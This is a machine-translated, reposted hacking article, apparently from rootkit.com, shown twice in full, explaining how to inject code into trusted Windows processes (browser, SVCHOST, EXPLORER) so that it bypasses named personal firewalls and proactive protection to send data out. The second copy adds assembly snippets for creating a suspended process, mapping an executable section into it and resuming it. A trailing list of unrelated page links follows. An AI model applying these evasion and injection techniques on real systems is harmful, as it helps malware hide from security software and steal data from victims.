Injected Evil
来源:互联网 发布:矩阵分析与计算答案 编辑:程序博客网 时间:2024/04/19 09:46
By: evilphreak
In this article I wish to describe techniques which will allow bypass of the majority of modern proactive protection and firewalls. This idea is not new and has travelled all over enough, but I present something new that has not appeared.
Some time was invested. The material is practical and only a theoretical minimum. Certainly, techniques like this are used some of the time in private utilities. But until recently these techniques have not been brought together and presented.
Much has been made to me by other researchers. For it, it is necessary to tell it thanks. For their boldness to lay out on public opinion the
unique methods. The bypass described here did not appear anywhere,
but is based on some known techniques. We will start.
The theory
======
What is a protection bypass? It is possibility to carry out action which are forbidden by protection. Here there are no rules and laws, there is simply problem to achieve result. There is a private war between authors of firewalls and proactive protection. Certainly, this is war. The presented material is only applicable to Windows NT OS though theoretical principles can be used anywhere. This is a short description of this model.
On the victim computer is a firewall which has ‘proactive protection’. The behavior-blocking firewall is defined by a set of rules. Rules are two kinds - global rules and rules for applications. Generally speaking, at the heart of bypass of any protection are 1) assumptions, 2) exceptions, and 3) errors made by developers of protection. These three things give bypass practically to any protection. And it should be known there has still not been a protection which has not broken.
We will apply this theory to personal firewalls and use three points set forth above. If search is successful, we have won.
To bypass a personal firewall it is necessary to use existing rules, or to destroy the model of rules, or to use an error in the ON protection. With errors in ON most difficult. First they are not universal, secondly they are difficult for finding and using. Most the best bypass uses a minimum of undocumented functions and structures and is applicable to all protection, i.e. is universal. I will not give such bypass
Therefore we will use
non-universal undocumented techniques. We will return to
rules firewall – if we break them in ring0, the protection comes to an end. To use existing rules in this purpose we use general injection techniques that have been known for a long time. I.e. code execution in a context of the entrusted application. So, if we somehow will force entrusted application
Internet Explorer to execute our code, we can send data bypassing protection.
In general universally it is necessary брять a browser by default and it to
use as a victim of execution of our code. And it is final in the injected code we exploit pre-existing rules which are available in firewall rather Internet Explorer
(for example, proceeding on 80 port). Now things are easy - to execute inject thus remained not noticed for proactive protection which run to close all methods
which are used for inject. Now we will describe concrete attacks which are applicable for concrete firewalls.
The general theory of injection
=================
Inject always consists their two stages:
1) Writing code in address space process-victim
2) Execute written code
These stages can be any kind - obvious or indirect and to use any accessible
techniques. If each of stages is not found out by protection, That can be carried out inject.
Thus each stage is obligatory, without any of them inject it will not be carried out.
CreateProcess
=============
Algorithm as follows: hooking in our the process from NTDLL - ZwCreateSection,
ZwQuerySection also we create process by means of CreateProcess. Before return from
CreateProcess are caused hooked ZwCreateSection/ZwQuerySection.
Here it is necessary to look inside mechanism process creations - when process, one of stages - opening of a file of an EXE-file and its displaying on address
space of created process is created. Projection creation becomes function
ZwCreateSection. In an interceptor of function ZwCreateSection it is possible
to write To this moment any data by means of the same KERNEL32!WriteProcessMemory
and thus proactive protection will be silent. Further after projection creation,
code CreateProcess receives an input point (Entry Point) new process (i.e. its primary stream)
by means of function ZwQuerySection. Interceptor ZwQuerySection returns an input
point, but not real - taken of optional header - and false - namely the address of
our code which is necessary for executing. I.e. In the image when function CreateProcess
will finish work will be will be executed our code which will send data where it
is necessary in a context of the entrusted application.
Well. Here there are some moments to which I would like to pay attention.
In output agent ZwCreateSection not always it is possible to write by means of WriteProcessMemory, it is found out by some protection. In this case it is
possible to intercept as well WriteProcessMemory which also is caused inside CreateProcess. When process in it is created variable environments of parental
process if obviously variable environments are not specified are written. Here in this place intercepting WriteProcessMemory it is possible to write down the
shellcode. Too most with PEB. Even easier simply to specify in parametre - lpEnvironment the address of ours shellcode. Well. But it too not always works.
There is a way of record which while works always - if it is possible to create process successfully. Algorithm of record the following:
1) Call CreateProcess with flag CREATE_SUSPENDED
2) file Creation, record shellcode in a file
3) Creation of a projection of a file with shellcode by means of NtCreateSection
4) file Displaying on address space of the suspended process by means of NtCreateSection
Way though also known, but it is far all authors of protection it while have covered.
Many protection block creation of network process, and some in general process creation. But not all. For example, known Kaspersky Internet Security
7.0.0.125 gives in on this attack. Also on this attack early versions Agnitum Outpost (and Outpost 2008 if it will be possible to create successfully process)
give in. Well and a heap overseas firewalls such as Norton Internet Security 2008, Bit Defender Total Security 2008, Zone Alarm 7 on average options
(on a maximum blocks), Agava Firewall, Ashampoo Firewall, AhnLab V3 Internet Security 2007, Black ICE PC Protection 3.6, Look'n'Stop 2.06, Normal Personal Firewall 1.4,
Visnetic Firewall 3.0 etc. etc.
Let's pass to practical realisation of the given method. The browser is by default received
By means of access to a key by default in разедел "http/shell/open/command":
After execution of the given code in buffer there will be a way to a browser by
default. Further we create process in suspended condition:
Further we create a projection of a file and it is projected it on address space
of the created process:
Here the problem comes to light. To what mapping shellcode address. After all already
during this moment we should change an input point to the address of ours shellcode (before return from CreateProcess in interceptor NtQuerySection). Let
it will be preliminary chosen address - a constant which under tests does not clash with available projections. But it will be obvious not stably since
conflicts can be and it is necessary to provide their absence. Therefore we do as follows. First time we cause CreateProcess with flag CREATE_SUSPENDED without
hook NtCreateSecion/NtQuerySection, then we do a projection to the address which will be chosen by system and we remember it. After that we destroy process.
Further we create process already with hooks the necessary functions, but already knowing the projection address. After process creation we do a
projection to already known address. Т.о. We do the test of the conflict for the given system. It should minimise coincidence of addresses of a
projection of ours shellcode and other memory allocated for the given moment. After this it is possible to consider bypass ended. It is necessary to renew only
performance of a primary stream (since we created process at which a primary stream is in the suspended condition) further:
NtQueueApcThread
================
bypass is based on a call of this function almost all existing now proactive protection
and firewalls, what powerful they would not seem. Here algorithm of bypass:
1) we Create DLL with a name coinciding last letters with DLL which is in import SVCHOST.EXE,
for example "ERNEL32.DLL". In DLL should be shellcode for execution in context SVCHOST.EXE (this application in rules of all firewalls can show
also activity as well as Internet Explorer).
2) we Search in address space of process SVCHOST.EXE a line "ERNEL32.DLL". It is possible
to do it by scanning by a call of function ReadProcessMemory (for this purpose preliminary it is necessary to open SVCHOST - OpenProcess (PROCESS_VM_READ)).
Other and better way of search of a line - mapping file SVCHOST.EXE to itself in address space - and to find in the table of import a line "ERNEL32.32".
Putting the relative address of a line with the base address of the module by default (ImageBase in optional header) we receive the address of the
necessary line.
3) we Touch streams of process SVCHOST.EXE and we do a call for each of them NtQueueApcThread.
This function adds to stream APC - a call of asynchronous procedure. But function has a restriction - procedure is carried out only in a case
if the stream has passed in mode Alartable. This fact causes a choice of process SVCHOST.EXE as a victim of execution shellcode. At research it became clear,
that in all versions Windows 2000/XP process SVCHOST.EXE has Alertable-streams and thus SVCHOST.EXE is the entrusted application with possible
network activity, that obviously grants the right to choose it as a victim. Also need to tell, that process SVCHOST.EXE exists in system always, otherwise OS
gets in BSOD (if to kill one of SVCHOST.EXE). Here a prototype of function NtQueueApcThread:
proc NtQueueApcThread hThread, FunctionAddress, Par1, Par2, Par3
Function adds in turn of asynchronous procedures new asynchronous procedure with
convention call is STDCALL and with transfer of three parametres Par1, Par2, Par3. Interestingly, but there is a function which is very exact to us approaches
and also accepts three parametres - LoadLibraryEx. Т.о. We simply load DLL into address space of process SVCHOST.EXE.
4) From most DLL it is impossible to do something, since this detection by the control of
components. Therefore that all of us it is done in DLLMain it - it is copied shellcode from the body, and it is kept in a file with known name TID and shellcode
address. Further after done actions DLL it is necessary to remove.
5) we Open a file created inside DllMain - and we put in turn of a known stream (it TID it is written
down in a file) the address of procedure which also is known. After that bypass is finished.
This bypass overcomes already both Comodo Firewall 2.4 and Agnitum Outpost 2008 and all protection
named in the previous section. Remained thus are live Jetico and Tiny - about bypass of these
protection I will speak here nothing since it is separate conversation. Zone Alarm 7 in a paranoid
mode catches this kind of bypass - namely does not allow to open a stream for a parcel in
it APC, but for it bypass which I will describe more low has been made separate.
Zone Alarm
==========
At ZoneAlarm special model - Trusted Application. If to execute something in context
Super Trusted of appendices ZA will not pay to this attention. One of such Super Trusted appendices is EXPLORER.EXE. At ZA special model of protection - she does
not suffer to intercept a heap of functions in SDT concerning streams and processes - it simply does not allow to open process and a stream with kinds of
access which can lead to safety infringement. I.e. if to open process or a stream ZA will swear. But the error which allows to open process all the same
has been found. Here algorithm:
1) we Open process with rights DUP_HANDLE is ZA allows.
2) we List descriptors EXPLORER.EXE in search of a descriptor of one of streams EXPLORER.EXE
in it. We look the rights for a descriptor - if they are maximum, we do call DuplicateHandle.
I.e. We receive a descriptor of a stream with the maximum privileges.
3) Now it is possible to make inject. Transfer control we can by means of function SetThreadContext,
the descriptor of a stream at us is. But that in process to write down data it is necessary used
the separate technics which is popular. About it in following point.
4) At transfer of descriptors we receive a port descriptor. At EXPLORER.EXE in all versions
there is a port. After reception of a descriptor of port we receive his name. After that call
NtConnectPort and section creation in which is we shellcode a projection of a file with
shellcode in the magic image it will appear in address space of process EXPLORER.EXE.
5) It is used SetThreadContext for transfer of management to ours shellcode.
6) Since on behalf of EXPLORER.EXE it is possible to do different system things (but it is
impossible to show network activity) without fear of alarm ZA we use a method with name
CreateProcess described above for definitive bypass ZA on paranoid options.
It is visible, that bypass is based what probably all the same to receive a descriptor
of a stream without detection ZA. Thus to us has carried, that process EXPLORER has in itself the descriptors of streams with maximum privileges,
and also has port, connection to which allows to write down data shellcode in address space of process-victim using earlier publicly an accessible method.
At research ZA also it was revealed, that ZA allows to open process СTFMON.EXE with the maximum privileges without the prevention of the user. It is the fact also
it can easily be used for bypass ZA. But CTFMON.ExE it is not always started (though and it is very frequent - itself Windows registers it in automatic loading
at installation), and has appeared only in Windows XP, therefore this way is not so universal (cannot be used on Windows 2000) though can will be applied with
success in Windows XP. Also on Windows XP SP2 it was revealed, that process EXPLORER.EXE has the descriptor with the maximum privileges, after its
reception probably to do with process any manipulations. But after the further tests it was revealed, that it is error Service Pack 2, and on Service Pack 1
this defect is not found out as well as on usual Windows XP RTM.
POC will not be - burn in a hell a script kiddies!
Greets to Ms-Rem, EP_XOFF, Tyler Durden, deadbody, ntldr
FEEBACK
=======
mail: evilphreak.blog.ru
web: evil_phreak@mail.ru
admin note: The author of this article apologizes for bad english. Most people who read rootkit.com understand that many of the articles are translated from native language - no problems. Staff took some liberty in attempting to rewrite a little bit of it.
In this article I wish to describe techniques which will allow bypass of the majority of modern proactive protection and firewalls. This idea is not new and has travelled all over enough, but I present something new that has not appeared.
Some time was invested. The material is practical and only a theoretical minimum. Certainly, techniques like this are used some of the time in private utilities. But until recently these techniques have not been brought together and presented.
Much has been made to me by other researchers. For it, it is necessary to tell it thanks. For their boldness to lay out on public opinion the
unique methods. The bypass described here did not appear anywhere,
but is based on some known techniques. We will start.
The theory
======
What is a protection bypass? It is possibility to carry out action which are forbidden by protection. Here there are no rules and laws, there is simply problem to achieve result. There is a private war between authors of firewalls and proactive protection. Certainly, this is war. The presented material is only applicable to Windows NT OS though theoretical principles can be used anywhere. This is a short description of this model.
On the victim computer is a firewall which has ‘proactive protection’. The behavior-blocking firewall is defined by a set of rules. Rules are two kinds - global rules and rules for applications. Generally speaking, at the heart of bypass of any protection are 1) assumptions, 2) exceptions, and 3) errors made by developers of protection. These three things give bypass practically to any protection. And it should be known there has still not been a protection which has not broken.
We will apply this theory to personal firewalls and use three points set forth above. If search is successful, we have won.
To bypass a personal firewall it is necessary to use existing rules, or to destroy the model of rules, or to use an error in the ON protection. With errors in ON most difficult. First they are not universal, secondly they are difficult for finding and using. Most the best bypass uses a minimum of undocumented functions and structures and is applicable to all protection, i.e. is universal. I will not give such bypass
Therefore we will usenon-universal undocumented techniques. We will return to
rules firewall – if we break them in ring0, the protection comes to an end. To use existing rules in this purpose we use general injection techniques that have been known for a long time. I.e. code execution in a context of the entrusted application. So, if we somehow will force entrusted application
Internet Explorer to execute our code, we can send data bypassing protection.
In general universally it is necessary брять a browser by default and it to
use as a victim of execution of our code. And it is final in the injected code we exploit pre-existing rules which are available in firewall rather Internet Explorer
(for example, proceeding on 80 port). Now things are easy - to execute inject thus remained not noticed for proactive protection which run to close all methods
which are used for inject. Now we will describe concrete attacks which are applicable for concrete firewalls.
The general theory of injection
=================
Inject always consists their two stages:
1) Writing code in address space process-victim
2) Execute written code
These stages can be any kind - obvious or indirect and to use any accessible
techniques. If each of stages is not found out by protection, That can be carried out inject.
Thus each stage is obligatory, without any of them inject it will not be carried out.
CreateProcess
=============
Algorithm as follows: hooking in our the process from NTDLL - ZwCreateSection,
ZwQuerySection also we create process by means of CreateProcess. Before return from
CreateProcess are caused hooked ZwCreateSection/ZwQuerySection.
Here it is necessary to look inside mechanism process creations - when process, one of stages - opening of a file of an EXE-file and its displaying on address
space of created process is created. Projection creation becomes function
ZwCreateSection. In an interceptor of function ZwCreateSection it is possible
to write To this moment any data by means of the same KERNEL32!WriteProcessMemory
and thus proactive protection will be silent. Further after projection creation,
code CreateProcess receives an input point (Entry Point) new process (i.e. its primary stream)
by means of function ZwQuerySection. Interceptor ZwQuerySection returns an input
point, but not real - taken of optional header - and false - namely the address of
our code which is necessary for executing. I.e. In the image when function CreateProcess
will finish work will be will be executed our code which will send data where it
is necessary in a context of the entrusted application.
Well. Here there are some moments to which I would like to pay attention.
In output agent ZwCreateSection not always it is possible to write by means of WriteProcessMemory, it is found out by some protection. In this case it is
possible to intercept as well WriteProcessMemory which also is caused inside CreateProcess. When process in it is created variable environments of parental
process if obviously variable environments are not specified are written. Here in this place intercepting WriteProcessMemory it is possible to write down the
shellcode. Too most with PEB. Even easier simply to specify in parametre - lpEnvironment the address of ours shellcode. Well. But it too not always works.
There is a way of record which while works always - if it is possible to create process successfully. Algorithm of record the following:
1) Call CreateProcess with flag CREATE_SUSPENDED
2) file Creation, record shellcode in a file
3) Creation of a projection of a file with shellcode by means of NtCreateSection
4) file Displaying on address space of the suspended process by means of NtCreateSection
Way though also known, but it is far all authors of protection it while have covered.
Many protection block creation of network process, and some in general process creation. But not all. For example, known Kaspersky Internet Security
7.0.0.125 gives in on this attack. Also on this attack early versions Agnitum Outpost (and Outpost 2008 if it will be possible to create successfully process)
give in. Well and a heap overseas firewalls such as Norton Internet Security 2008, Bit Defender Total Security 2008, Zone Alarm 7 on average options
(on a maximum blocks), Agava Firewall, Ashampoo Firewall, AhnLab V3 Internet Security 2007, Black ICE PC Protection 3.6, Look'n'Stop 2.06, Normal Personal Firewall 1.4,
Visnetic Firewall 3.0 etc. etc.
Let's pass to practical realisation of the given method. The browser is by default received
By means of access to a key by default in разедел "http/shell/open/command":
lea ecx, [hKey]
push ecx
push KEY_READ
push 0
lea ecx, [SubKey]
push ecx
push HKEY_CLASSES_ROOT
call RegOpenKeyEx
lea ecx, [cbData]
push ecx
lea ecx, [Buffer]
push ecx
push NULL
push NULL
push NULL
push [hKey]
call RegQueryValueEx
After execution of the given code in buffer there will be a way to a browser by
default. Further we create process in suspended condition:
lea eax, [pi]
push eax
lea eax, [si]
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push 0
push NULL
push NULL
lea eax, [Buffer]
push eax
push NULL
call CreateProcess
Further we create a projection of a file and it is projected it on address space
of the created process:
push [hFile]
push 0x8000000; SEC_COMMIT
push PAGE_EXECUTE_READWRITE
push NULL
push NULL
push SECTION_ALL_ACCESS
lea eax, [hSection]
push eax
call NtCreateSection
push PAGE_EXECUTE_READWRITE
push 0
push 1; ViewShare
mov [ViewSize], 0
lea ecx, [ViewSize]
push ecx
push NULL
push 0
push 0
push [ebx+FreeBaseAddress-NormalCodeStart]
pop [BaseAddress]
lea ecx, [BaseAddress]
push ecx
push [pi + PROCESS_INFORMATION.hProcess]
push [hSection]
call NtMapViewOfSection
Here the problem comes to light. To what mapping shellcode address. After all already
during this moment we should change an input point to the address of ours shellcode (before return from CreateProcess in interceptor NtQuerySection). Let
it will be preliminary chosen address - a constant which under tests does not clash with available projections. But it will be obvious not stably since
conflicts can be and it is necessary to provide their absence. Therefore we do as follows. First time we cause CreateProcess with flag CREATE_SUSPENDED without
hook NtCreateSecion/NtQuerySection, then we do a projection to the address which will be chosen by system and we remember it. After that we destroy process.
Further we create process already with hooks the necessary functions, but already knowing the projection address. After process creation we do a
projection to already known address. Т.о. We do the test of the conflict for the given system. It should minimise coincidence of addresses of a
projection of ours shellcode and other memory allocated for the given moment. After this it is possible to consider bypass ended. It is necessary to renew only
performance of a primary stream (since we created process at which a primary stream is in the suspended condition) further:
push [pi + PROCESS_INFORMATION.hThread]
call ResumeThread
NtQueueApcThread
================
bypass is based on a call of this function almost all existing now proactive protection
and firewalls, what powerful they would not seem. Here algorithm of bypass:
1) we Create DLL with a name coinciding last letters with DLL which is in import SVCHOST.EXE,
for example "ERNEL32.DLL". In DLL should be shellcode for execution in context SVCHOST.EXE (this application in rules of all firewalls can show
also activity as well as Internet Explorer).
2) we Search in address space of process SVCHOST.EXE a line "ERNEL32.DLL". It is possible
to do it by scanning by a call of function ReadProcessMemory (for this purpose preliminary it is necessary to open SVCHOST - OpenProcess (PROCESS_VM_READ)).
Other and better way of search of a line - mapping file SVCHOST.EXE to itself in address space - and to find in the table of import a line "ERNEL32.32".
Putting the relative address of a line with the base address of the module by default (ImageBase in optional header) we receive the address of the
necessary line.
3) we Touch streams of process SVCHOST.EXE and we do a call for each of them NtQueueApcThread.
This function adds to stream APC - a call of asynchronous procedure. But function has a restriction - procedure is carried out only in a case
if the stream has passed in mode Alartable. This fact causes a choice of process SVCHOST.EXE as a victim of execution shellcode. At research it became clear,
that in all versions Windows 2000/XP process SVCHOST.EXE has Alertable-streams and thus SVCHOST.EXE is the entrusted application with possible
network activity, that obviously grants the right to choose it as a victim. Also need to tell, that process SVCHOST.EXE exists in system always, otherwise OS
gets in BSOD (if to kill one of SVCHOST.EXE). Here a prototype of function NtQueueApcThread:
proc NtQueueApcThread hThread, FunctionAddress, Par1, Par2, Par3
Function adds in turn of asynchronous procedures new asynchronous procedure with
convention call is STDCALL and with transfer of three parametres Par1, Par2, Par3. Interestingly, but there is a function which is very exact to us approaches
and also accepts three parametres - LoadLibraryEx. Т.о. We simply load DLL into address space of process SVCHOST.EXE.
4) From most DLL it is impossible to do something, since this detection by the control of
components. Therefore that all of us it is done in DLLMain it - it is copied shellcode from the body, and it is kept in a file with known name TID and shellcode
address. Further after done actions DLL it is necessary to remove.
5) we Open a file created inside DllMain - and we put in turn of a known stream (it TID it is written
down in a file) the address of procedure which also is known. After that bypass is finished.
This bypass overcomes already both Comodo Firewall 2.4 and Agnitum Outpost 2008 and all protection
named in the previous section. Remained thus are live Jetico and Tiny - about bypass of these
protection I will speak here nothing since it is separate conversation. Zone Alarm 7 in a paranoid
mode catches this kind of bypass - namely does not allow to open a stream for a parcel in
it APC, but for it bypass which I will describe more low has been made separate.
Zone Alarm
==========
At ZoneAlarm special model - Trusted Application. If to execute something in context
Super Trusted of appendices ZA will not pay to this attention. One of such Super Trusted appendices is EXPLORER.EXE. At ZA special model of protection - she does
not suffer to intercept a heap of functions in SDT concerning streams and processes - it simply does not allow to open process and a stream with kinds of
access which can lead to safety infringement. I.e. if to open process or a stream ZA will swear. But the error which allows to open process all the same
has been found. Here algorithm:
1) we Open process with rights DUP_HANDLE is ZA allows.
2) we List descriptors EXPLORER.EXE in search of a descriptor of one of streams EXPLORER.EXE
in it. We look the rights for a descriptor - if they are maximum, we do call DuplicateHandle.
I.e. We receive a descriptor of a stream with the maximum privileges.
3) Now it is possible to make inject. Transfer control we can by means of function SetThreadContext,
the descriptor of a stream at us is. But that in process to write down data it is necessary used
the separate technics which is popular. About it in following point.
4) At transfer of descriptors we receive a port descriptor. At EXPLORER.EXE in all versions
there is a port. After reception of a descriptor of port we receive his name. After that call
NtConnectPort and section creation in which is we shellcode a projection of a file with
shellcode in the magic image it will appear in address space of process EXPLORER.EXE.
5) It is used SetThreadContext for transfer of management to ours shellcode.
6) Since on behalf of EXPLORER.EXE it is possible to do different system things (but it is
impossible to show network activity) without fear of alarm ZA we use a method with name
CreateProcess described above for definitive bypass ZA on paranoid options.
It is visible, that bypass is based what probably all the same to receive a descriptor
of a stream without detection ZA. Thus to us has carried, that process EXPLORER has in itself the descriptors of streams with maximum privileges,
and also has port, connection to which allows to write down data shellcode in address space of process-victim using earlier publicly an accessible method.
At research ZA also it was revealed, that ZA allows to open process СTFMON.EXE with the maximum privileges without the prevention of the user. It is the fact also
it can easily be used for bypass ZA. But CTFMON.ExE it is not always started (though and it is very frequent - itself Windows registers it in automatic loading
at installation), and has appeared only in Windows XP, therefore this way is not so universal (cannot be used on Windows 2000) though can will be applied with
success in Windows XP. Also on Windows XP SP2 it was revealed, that process EXPLORER.EXE has the descriptor with the maximum privileges, after its
reception probably to do with process any manipulations. But after the further tests it was revealed, that it is error Service Pack 2, and on Service Pack 1
this defect is not found out as well as on usual Windows XP RTM.
POC will not be - burn in a hell a script kiddies!
Greets to Ms-Rem, EP_XOFF, Tyler Durden, deadbody, ntldr
FEEBACK
=======
mail: evilphreak.blog.ru
web: evil_phreak@mail.ru
- Injected Evil
- Evil
- Evil
- You Injected What? Where?
- You Injected What? Where?
- hdu5892Resident Evil
- Obtain Play's injected object
- @EnableAsync annotation metadata was not injected
- IDEA_Debug_checks references injected by intellilang plugin
- @EnableAsync annotation metadata was not injected s
- @EnableAsync annotation metadata was not injected
- C++咬文嚼字-'Evil cast'
- Vista is evil!
- Why extends is evil
- ZFS Evil tuning guide
- Singletons Are Evil
- Before Evil Come
- Before Evil Come Postmortem
- 关于VC单选按钮不能设置变量的问题以及Group属性的设置
- 感谢首都人民
- Simple Windows Service Sample
- Try1
- 系统开发之需求分析--心得体会(二)
- Injected Evil
- Oracle取整的函数.
- A New-Generation Rootkit Detector
- IRP hooking and Device Chains
- TO_DATE函数的小问题
- 转自51cto(http://smailes.blog.51cto.com/rss.php?uid=28248)
- 1-Log4j使用详解
- TO_DATE函数的小问题 --碧水云天
- 关于我们这一代人就业的一点理性思考
